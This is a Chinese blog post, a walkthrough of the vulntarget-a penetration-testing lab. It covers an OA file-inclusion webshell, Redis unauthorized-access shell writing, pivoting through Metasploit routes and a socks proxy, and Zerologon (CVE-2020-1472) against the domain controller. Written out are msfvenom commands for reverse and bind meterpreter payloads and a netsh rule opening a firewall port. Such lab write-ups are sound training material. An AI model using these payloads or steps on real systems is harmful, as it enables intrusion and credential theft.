<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/1655090890230.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/1655090890230.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":3,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="vulntarget-a">
<meta property="og:type" content="article">
<meta property="og:title" content="[靶场练习]vulntarget-a">
<meta property="og:url" content="http://example.com/2022/11/04/vulntarget-a/index.html">
<meta property="og:site_name" content="Security">
<meta property="og:description" content="vulntarget-a">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://s2.loli.net/2022/11/04/WlRN2qSwuMHyPTJ.png">
<meta property="og:image" content="https://s2.loli.net/2022/11/04/luaVfbCq7S4p5TK.png">
<meta property="og:image" content="https://s2.loli.net/2022/11/04/sTUxDMRHP8ZnVLN.png">
<meta property="og:image" content="https://s2.loli.net/2022/11/04/ElRdqpjciaBVTPx.png">
<meta property="og:image" content="https://s2.loli.net/2022/11/04/LC6UnaOqei4zrxu.png">
<meta property="og:image" content="https://s2.loli.net/2022/11/04/PTsyKbzx1hoYkGj.png">
<meta property="og:image" content="https://s2.loli.net/2022/11/04/HGgVtBvhIr7yKL2.png">
<meta property="og:image" content="https://s2.loli.net/2022/11/04/K5woYLIgaUcz8MW.png">
<meta property="og:image" content="https://s2.loli.net/2022/11/04/aZt36uwkOmLSipU.png">
<meta property="og:image" content="https://s2.loli.net/2022/11/04/aSUQ26fAueWhXGO.png">
<meta property="og:image" content="https://s2.loli.net/2022/11/04/gvZPzBLDKbqd8pR.png">
<meta property="og:image" content="https://s2.loli.net/2022/11/04/sfiwtQPAzW5YoF1.png">
<meta property="og:image" content="https://s2.loli.net/2022/11/04/3LU8JPxmc9hgG1j.png">
<meta property="og:image" content="https://s2.loli.net/2022/11/04/KN5XeAcypYP9UGS.png">
<meta property="og:image" content="https://s2.loli.net/2022/11/04/GANuCEWyM9n8qKS.png">
<meta property="og:image" content="https://s2.loli.net/2022/11/10/7o9YKA3XfzLIchP.png">
<meta property="og:image" content="https://s2.loli.net/2022/11/10/7TCshbtDmrH3Yil.png">
<meta property="og:image" content="https://s2.loli.net/2022/11/10/zKHwFrkBPGRWaNT.png">
<meta property="og:image" content="https://s2.loli.net/2022/11/10/DAczkF4r7mhd5wB.png">
<meta property="og:image" content="https://s2.loli.net/2022/11/10/v64PikxdAwZngrR.png">
<meta property="og:image" content="https://s2.loli.net/2022/11/10/rTikDfs7CeR9gGW.png">
<meta property="og:image" content="https://s2.loli.net/2022/11/10/WtEjOI7bUxeudMs.png">
<meta property="og:image" content="https://s2.loli.net/2022/11/10/mxBZGRaIkYFLSqJ.png">
<meta property="og:image" content="https://s2.loli.net/2022/11/10/TS5pKzHXeq9FrJB.png">
<meta property="og:image" content="https://s2.loli.net/2022/11/10/3iIjopxcrqJ71AR.png">
<meta property="og:image" content="https://s2.loli.net/2022/11/10/27mUQPWEToNflYg.png">
<meta property="og:image" content="https://s2.loli.net/2022/11/10/enPsiVp1Q5h2G8x.png">
<meta property="og:image" content="https://s2.loli.net/2022/11/10/UKCc1SFODuEjbqB.png">
<meta property="og:image" content="https://s2.loli.net/2022/11/10/s6cAtRUNOzefi7F.png">
<meta property="og:image" content="https://s2.loli.net/2022/11/10/MT3AOX8BKLqkfPw.png">
<meta property="og:image" content="https://s2.loli.net/2022/11/10/Q5EzJOWBmSUPRTf.png">
<meta property="og:image" content="https://s2.loli.net/2022/11/10/2Gj95JbfOCh1ydF.png">
<meta property="og:image" content="https://s2.loli.net/2022/11/10/osaVgeH32F7TOcQ.png">
<meta property="og:image" content="https://s2.loli.net/2022/11/10/IGmeZan2zFhV7qk.png">
<meta property="article:published_time" content="2022-11-04T08:13:25.758Z">
<meta property="article:modified_time" content="2022-11-20T15:01:13.731Z">
<meta property="article:author" content="花烬">
<meta property="article:tag" content="靶场">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://s2.loli.net/2022/11/04/WlRN2qSwuMHyPTJ.png">

<link rel="canonical" href="http://example.com/2022/11/04/vulntarget-a/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>[靶场练习]vulntarget-a | Security</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

<link rel="stylesheet" href="/css/prism-tomorrow.css" type="text/css"></head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">Security</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="tags fa-fw"></i>标签<span class="badge">8</span></a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="th fa-fw"></i>分类<span class="badge">9</span></a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="archive fa-fw"></i>归档<span class="badge">21</span></a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2022/11/04/vulntarget-a/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="花烬">
      <meta itemprop="description" content="我于杀戮之中盛放，亦如黎明中的花朵">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Security">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          [靶场练习]vulntarget-a
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2022-11-04 16:13:25" itemprop="dateCreated datePublished" datetime="2022-11-04T16:13:25+08:00">2022-11-04</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2022-11-20 23:01:13" itemprop="dateModified" datetime="2022-11-20T23:01:13+08:00">2022-11-20</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/" itemprop="url" rel="index"><span itemprop="name">渗透测试</span></a>
                </span>
                  ，
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/%E6%B8%97%E9%80%8F%E5%AD%A6%E4%B9%A0/" itemprop="url" rel="index"><span itemprop="name">渗透学习</span></a>
                </span>
            </span>

          
            <div class="post-description">vulntarget-a</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>设置vmware的双网卡必须匹配一致</p>
<pre><code>1.web7 

开机密码admin

2.win2016 

开机密码 Admin#123

管理员 Administrator/Admin@666

 3.Win2019

开机密码Admin@666
</code></pre>
<h1 id="外网渗透"><a href="#外网渗透" class="headerlink" title="外网渗透"></a>外网渗透</h1><h2 id="OA文件包含"><a href="#OA文件包含" class="headerlink" title="OA文件包含"></a>OA文件包含</h2><p>扫描端口发现80端口</p>
<p><img src="https://s2.loli.net/2022/11/04/WlRN2qSwuMHyPTJ.png" alt="image.png"></p>
<p>查看网站为OA系统</p>
<p><img src="https://s2.loli.net/2022/11/04/luaVfbCq7S4p5TK.png" alt="image.png"></p>
<p>文件包含拿webshell</p>
<p><img src="https://s2.loli.net/2022/11/04/sTUxDMRHP8ZnVLN.png" alt="image.png"></p>
<p>蚁剑连接</p>
<p><img src="https://s2.loli.net/2022/11/04/ElRdqpjciaBVTPx.png" alt="image.png"></p>
<p>上线CS</p>
<p><img src="https://s2.loli.net/2022/11/04/LC6UnaOqei4zrxu.png" alt="image.png"></p>
<h1 id="内网渗透"><a href="#内网渗透" class="headerlink" title="内网渗透"></a>内网渗透</h1><h2 id="对Win2016进行Redis未授权"><a href="#对Win2016进行Redis未授权" class="headerlink" title="对Win2016进行Redis未授权"></a>对Win2016进行Redis未授权</h2><p>这里发现存在另一张网卡</p>
<p><img src="https://s2.loli.net/2022/11/04/PTsyKbzx1hoYkGj.png" alt="image.png"></p>
<p>获取Window7密码</p>
<p><img src="https://s2.loli.net/2022/11/04/HGgVtBvhIr7yKL2.png" alt="image.png"></p>
<p>使用proxychains4代理，访问redis的未授权</p>
<p><img src="https://s2.loli.net/2022/11/04/K5woYLIgaUcz8MW.png" alt="image.png"></p>
<p>这里有个槽点，就是VMWARE放两张仅主机网卡，原本设置IP为10的网卡却变成了20，为此这个细节花了整整一大半时间，我寻思这仅主机配的也没错呀，原来不是代理慢问题。。。</p>
<p>代理查找开放端口</p>
<p><img src="https://s2.loli.net/2022/11/04/aZt36uwkOmLSipU.png" alt="image.png"></p>
<p>存在网页，返回hello world</p>
<p><img src="https://s2.loli.net/2022/11/04/aSUQ26fAueWhXGO.png" alt="image.png"></p>
<p>对Redis进行未授权攻击</p>
<p><img src="https://s2.loli.net/2022/11/04/gvZPzBLDKbqd8pR.png" alt="image.png"></p>
<p>这里需要知道Web的目录路径才可以写入一句话</p>
<p><img src="https://s2.loli.net/2022/11/04/sfiwtQPAzW5YoF1.png" alt="image.png"></p>
<p>蚁剑挂代理</p>
<p><img src="https://s2.loli.net/2022/11/04/3LU8JPxmc9hgG1j.png" alt="image.png"></p>
<p>连接小马</p>
<p><img src="https://s2.loli.net/2022/11/04/KN5XeAcypYP9UGS.png" alt="image.png"></p>
<p>查看网卡，存在另一个网段，域vulntarget.com</p>
<p><img src="https://s2.loli.net/2022/11/04/GANuCEWyM9n8qKS.png" alt="image.png"></p>
<h2 id="挂多层代理"><a href="#挂多层代理" class="headerlink" title="挂多层代理"></a>挂多层代理</h2><p>想Window2016，有多种方法</p>
<ol>
<li>通过上传小马到启动项里，然后用CS开启监听</li>
<li>不出网监听</li>
</ol>
<blockquote>
<p>CS二层代理过不去关，我用MSF做二层，正向和反向皆不行，是因为在kali这层并未做代理，让kali能与10.0.20.0&#x2F;24这个网段相互通，所以重新用MSF做一层代理再跳二层</p>
</blockquote>
<p>Msf反向连接win7，先生成后门</p>
<pre><code>msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.50.246 LPORT=1111 -f exe &gt; /home/f1.exe
</code></pre>
<p><img src="https://s2.loli.net/2022/11/10/7o9YKA3XfzLIchP.png" alt="image.png"></p>
<p>查看子网网段</p>
<p><img src="https://s2.loli.net/2022/11/10/7TCshbtDmrH3Yil.png" alt="image.png"></p>
<p>添加路由</p>
<p><img src="https://s2.loli.net/2022/11/10/zKHwFrkBPGRWaNT.png" alt="image.png"></p>
<p>查看已添加的路由</p>
<p><img src="https://s2.loli.net/2022/11/10/DAczkF4r7mhd5wB.png" alt="image.png"></p>
<p>添加socks5代理</p>
<p><img src="https://s2.loli.net/2022/11/10/v64PikxdAwZngrR.png" alt="image.png"></p>
<p>修改proxychain.conf</p>
<p><img src="https://s2.loli.net/2022/11/10/rTikDfs7CeR9gGW.png" alt="image.png"></p>
<p>对10.0.20.99进行curl</p>
<p><img src="https://s2.loli.net/2022/11/10/WtEjOI7bUxeudMs.png" alt="image.png"></p>
<p>使用arp -a发现10.0.20.99</p>
<p><img src="https://s2.loli.net/2022/11/10/mxBZGRaIkYFLSqJ.png" alt="image.png"></p>
<p>配置蚁剑的代理服务器</p>
<p><img src="https://s2.loli.net/2022/11/10/TS5pKzHXeq9FrJB.png" alt="image.png"></p>
<p>按照上面的Redis未授权写进shell，小马连接</p>
<p>正向连接生成木马</p>
<pre><code>msfvenom -p windows/x64/meterpreter/bind_tcp  LPORT=8090 -f exe &gt; 8090_bind.exe
</code></pre>
<p>设置规则</p>
<pre><code>netsh advfirewall firewall add rule name=&quot;bind tcp&quot; protocol=TCP dir=in localport=8090 action=allow
</code></pre>
<p><img src="https://s2.loli.net/2022/11/10/3iIjopxcrqJ71AR.png" alt="image.png"></p>
<p>发现存在10.0.10.0&#x2F;24网段</p>
<p><img src="https://s2.loli.net/2022/11/10/27mUQPWEToNflYg.png" alt="image.png"></p>
<p>查看主机路由</p>
<p><img src="https://s2.loli.net/2022/11/10/enPsiVp1Q5h2G8x.png" alt="image.png"></p>
<p>添加到10.0.10.0&#x2F;24的路由</p>
<p><img src="https://s2.loli.net/2022/11/10/UKCc1SFODuEjbqB.png" alt="image.png"></p>
<p>查看域管理员为administrator</p>
<p><img src="https://s2.loli.net/2022/11/10/s6cAtRUNOzefi7F.png" alt="image.png"></p>
<p>查看域控制器计算机为Win2019$</p>
<p><img src="https://s2.loli.net/2022/11/10/MT3AOX8BKLqkfPw.png" alt="image.png"></p>
<h2 id="CVE-2020-1472提权到域控"><a href="#CVE-2020-1472提权到域控" class="headerlink" title="CVE-2020-1472提权到域控"></a>CVE-2020-1472提权到域控</h2><p>使用漏洞将密码制空，EXP地址<a target="_blank" rel="noopener" href="https://github.com/dirkjanm/CVE-2020-1472">https://github.com/dirkjanm/CVE-2020-1472</a></p>
<p>还得添加路由和迁移进程</p>
<p><img src="https://s2.loli.net/2022/11/10/Q5EzJOWBmSUPRTf.png" alt="image.png"></p>
<p><img src="https://s2.loli.net/2022/11/10/2Gj95JbfOCh1ydF.png" alt="image.png"></p>
<p>再使用<a target="_blank" rel="noopener" href="https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py%EF%BC%8C%E5%B0%86hash%E5%80%BCdump%E5%87%BA%E6%9D%A5">https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py，将hash值dump出来</a></p>
<p><img src="https://s2.loli.net/2022/11/10/osaVgeH32F7TOcQ.png" alt="image.png"></p>
<p>拿join工具获得Window2019开机密码为Admin@666</p>
<p>使用smbexec拿到域控的shell</p>
<p><img src="https://s2.loli.net/2022/11/10/IGmeZan2zFhV7qk.png" alt="image.png"></p>
<p>跟上面一样，把小马发给wind2016上，防火墙设置允许端口入站</p>
<h1 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h1><p><a target="_blank" rel="noopener" href="https://cloud.tencent.com/developer/article/1954759">https://cloud.tencent.com/developer/article/1954759</a></p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_48421613/article/details/123626822">https://blog.csdn.net/weixin_48421613/article/details/123626822</a></p>

    </div>

    
    
    
        

<div>
<ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>本文作者： </strong>花烬
  </li>
  <li class="post-copyright-link">
    <strong>本文链接：</strong>
    <a href="http://example.com/2022/11/04/vulntarget-a/" title="[靶场练习]vulntarget-a">http://example.com/2022/11/04/vulntarget-a/</a>
  </li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" rel="noopener" target="_blank"><i class="fab fa-fw fa-creative-commons"></i>BY-NC-SA</a> 许可协议。转载请注明出处！
  </li>
</ul>
</div>


      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/%E9%9D%B6%E5%9C%BA/" rel="tag"># 靶场</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2022/11/02/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95-%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/" rel="prev" title="信息收集">
      <i class="fa fa-chevron-left"></i> 信息收集
    </a></div>
      <div class="post-nav-item">
    <a href="/2022/11/07/%E6%97%A5%E8%AE%B0-20221007/" rel="next" title="2022/11/07">
      2022/11/07 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%89%8D%E8%A8%80"><span class="nav-number">1.</span> <span class="nav-text">前言</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%A4%96%E7%BD%91%E6%B8%97%E9%80%8F"><span class="nav-number">2.</span> <span class="nav-text">外网渗透</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#OA%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB"><span class="nav-number">2.1.</span> <span class="nav-text">OA文件包含</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F"><span class="nav-number">3.</span> <span class="nav-text">内网渗透</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%AF%B9Win2016%E8%BF%9B%E8%A1%8CRedis%E6%9C%AA%E6%8E%88%E6%9D%83"><span class="nav-number">3.1.</span> <span class="nav-text">对Win2016进行Redis未授权</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%8C%82%E5%A4%9A%E5%B1%82%E4%BB%A3%E7%90%86"><span class="nav-number">3.2.</span> <span class="nav-text">挂多层代理</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#CVE-2020-1472%E6%8F%90%E6%9D%83%E5%88%B0%E5%9F%9F%E6%8E%A7"><span class="nav-number">3.3.</span> <span class="nav-text">CVE-2020-1472提权到域控</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%8F%82%E8%80%83"><span class="nav-number">4.</span> <span class="nav-text">参考</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">花烬</p>
  <div class="site-description" itemprop="description">我于杀戮之中盛放，亦如黎明中的花朵</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">21</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">9</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">8</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="cc-license motion-element" itemprop="license">
    <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" class="cc-opacity" rel="noopener" target="_blank"><img src="/images/cc-by-nc-sa.svg" alt="Creative Commons"></a>
  </div>



      </div>
	  

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">花烬</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  

</body>
</html>
